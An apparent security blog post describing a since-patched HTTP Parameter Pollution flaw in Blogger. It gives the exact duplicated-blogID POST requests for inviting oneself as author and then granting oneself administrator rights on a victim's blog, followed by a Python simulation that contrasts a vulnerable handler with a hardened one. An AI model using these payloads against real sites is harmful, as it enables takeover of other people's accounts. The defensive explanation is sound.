Vulnerability Patched: Gaining Administrator Privileges On Any Blogger Account



Some months back, a vulnerability was found in blogger.com through which anyone could gain administrator access to any Blogger blog. It was an HTTP Parameter Pollution (HPP) vulnerability: a permission check that could be bypassed by sending the same parameter twice, which let the attacker first add himself as an author on the victim's blog and then promote himself to administrator. The source of this news is Nir Goldshlager, who participated in the Google reward program and found several high-severity vulnerabilities. It sounds crazy, but it is true. He also gave a video demonstration of the issue (linked at the end of this post).

Technical details:

Here is the concise procedure for getting administrator permissions over any Blogger blog.

1. The attacker uses the invite-author option in Blogger (add authors):

Vulnerability location:

POST /add-authors.do HTTP/1.1

Request body:

security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com&ok=Invite

(authorsList is the attacker's own email address.) As you can see, the POST body carries two blogID values: blogID=attackerblogidvalue&blogID=victimblogidvalue. This is the parameter pollution.

The server checks the permission against the first blogID value (the attacker's own blog, where he is legitimately an administrator), but applies the invitation to the second blogID value (the victim's blog).


2. The attacker then receives a mail confirming him as an author (the same author-invitation link Blogger sends when we invite someone to post articles on our blog). After accepting it, the attacker is added as an author on the victim's blog.


3. At this step it becomes possible to modify the attacker's permission from author to administrator.
Vulnerability location:
POST /team-member-modify.do HTTP/1.1
Request body:
security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges
As you can see, there is another field in this request called memberID.

Every administrator or author of a Blogger blog has a memberID value, so the attacker also has to supply his own memberID in this POST request. That is why, to make the attack succeed (become administrator), the attacker must first add himself as an author on the victim's blog in step 1; only a member can be promoted in this step. The duplicated blogID works exactly as in step 1: the permission check passes against the attacker's own blog, while the promotion is applied to the victim's blog. Now the attacker can revoke the victim's administrator privileges and take over the blog.
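The following is an added simulation of the two-step attack above, not code from the original post and not Blogger's own code (which is not public). It models the bug the post describes: a handler that runs its permission check on the first blogID occurrence but performs the action on the last one, next to a hardened handler that rejects any repeated parameter. The blog store, member model, user names and the exact handler logic are constructed for this example; the two request bodies mirror the ones shown in the post.

```python
"""Hypothetical simulation of the HTTP Parameter Pollution (HPP) authorisation
bypass described in the post.  Blog state, member model and handler logic are
constructed for illustration; nothing here is taken from Blogger's code."""
import copy
from urllib.parse import parse_qs

# Constructed sample state: blog id -> {member -> role}.
# Each user is an administrator only of their own blog.
SAMPLE_BLOGS = {
    "attackerblogidvalue": {"attacker": "admin"},
    "victimblogidvalue": {"victim": "admin"},
}

# Constructed request bodies modelled on the two shown in the post.
STEP1_INVITE = ("security_token=attackertoken&blogID=attackerblogidvalue"
                "&blogID=victimblogidvalue&authorsList=attacker&ok=Invite")
STEP2_PROMOTE = ("security_token=attackertoken&blogID=attackerblogidvalue"
                 "&blogID=victimblogidvalue&memberID=attacker&isAdmin=true"
                 "&ok=Grant+admin+privileges")


class ParamPollutionError(ValueError):
    """Raised by the hardened handler when any parameter is repeated."""


def _require_admin(blogs, blog_id, user):
    if blogs.get(blog_id, {}).get(user) != "admin":
        raise PermissionError(f"{user} is not an admin of {blog_id}")


def _apply(blogs, blog_id, p):
    """Shared action logic: invite an author, or promote a member to admin.
    The mail confirmation of step 2 is short-cut: the invitee is added
    as an author immediately."""
    action = p["ok"][0]
    if action == "Invite":
        blogs[blog_id][p["authorsList"][0]] = "author"
    elif action == "Grant admin privileges" and p["isAdmin"][0] == "true":
        member = p["memberID"][0]
        if member not in blogs[blog_id]:          # must already be a member
            raise LookupError(f"{member} is not a member of {blog_id}")
        blogs[blog_id][member] = "admin"
    else:
        raise ValueError(f"unknown action {action!r}")
    return blogs[blog_id]


def vulnerable_handler(blogs, body, session_user):
    """Vulnerable: parse_qs returns a list per parameter; the permission check
    reads blogID[0] while the action uses blogID[-1], so the attacker's own
    blog authorises a change to the victim's blog."""
    p = parse_qs(body, keep_blank_values=True)
    blog_ids = p["blogID"]
    _require_admin(blogs, blog_ids[0], session_user)   # check: first value
    return _apply(blogs, blog_ids[-1], p)              # act:   last value


def hardened_handler(blogs, body, session_user):
    """Hardened: refuse any repeated parameter, then use the single blogID
    for both the permission check and the action."""
    p = parse_qs(body, keep_blank_values=True)
    repeated = sorted(k for k, v in p.items() if len(v) != 1)
    if repeated:
        raise ParamPollutionError(f"repeated parameter(s): {repeated}")
    blog_id = p["blogID"][0]
    _require_admin(blogs, blog_id, session_user)
    return _apply(blogs, blog_id, p)


def try_request(handler, blogs, body, user):
    """Run one request; return the affected member map or the exception name."""
    try:
        return handler(blogs, body, user)
    except Exception as exc:
        return type(exc).__name__


def run_attack(handler):
    """Replay both steps against a fresh copy of the sample state and return
    the victim blog's final member map (or the name of the blocking error)."""
    blogs = copy.deepcopy(SAMPLE_BLOGS)
    for body in (STEP1_INVITE, STEP2_PROMOTE):
        result = try_request(handler, blogs, body, "attacker")
        if isinstance(result, str):
            return result
    return blogs["victimblogidvalue"]


if __name__ == "__main__":
    print("vulnerable:", run_attack(vulnerable_handler))
    print("hardened:  ", run_attack(hardened_handler))
```

The decisive detail is that the vulnerable handler never sees anything odd: each lookup is a valid, well-formed request from a user who really is an administrator of the blog named in the value it checks. The fix is not to "use the first value" or "use the last value" consistently (that only makes the framework's tie-break rule part of your security model) but to reject duplicates outright for parameters that select the object being authorised.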


To watch the video demonstration of this hack, go here.

Note: This was reported by Nir Goldshlager to the Google security team and the vulnerability has since been patched. I found it interesting, so I am sharing it here at Hackers Thirst.
Source of news:
Nir Goldshlager